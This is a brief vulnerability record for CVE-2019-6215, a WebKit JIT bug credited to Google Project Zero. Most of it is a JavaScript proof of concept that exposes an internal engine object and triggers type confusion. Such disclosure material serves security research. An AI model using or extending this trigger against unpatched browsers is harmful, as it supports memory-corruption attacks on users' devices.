CVE-2019-6215.md

CVE-2019-6215

• Report: Nov 2018
• Fix: Feb 2019
• Credit: lokihardt, Google Project Zero

PoC

function opt(o) {
    return o.r.input;
}

Object.assign({}, RegExp);  // Reifying

for (let i = 0; i < 200000; i++) {
    opt({r: RegExp});
}

let input = opt({r: RegExp});   // Pulling the CustomGetterSetter object.

let o = {
    a0: 0x1234,
    a1: 0x1234,
    a2: 0x1234,
    a3: 0x1234,
    a4: 0x1234,
    a5: 0x1234,
    a6: 0x1234,
    a7: 0x1234,
    a8: 0x1234,
    a9: 0x1234,
    a10: 0x1234,
    a11: 0x1234,
}

o.input = input;

print(o.input);  // The normal interpreter doesn't see the attributes, so it will just call the underneath getter using callCustomGetter.

Reference

• Apple
• WebKit
• Google Project Zero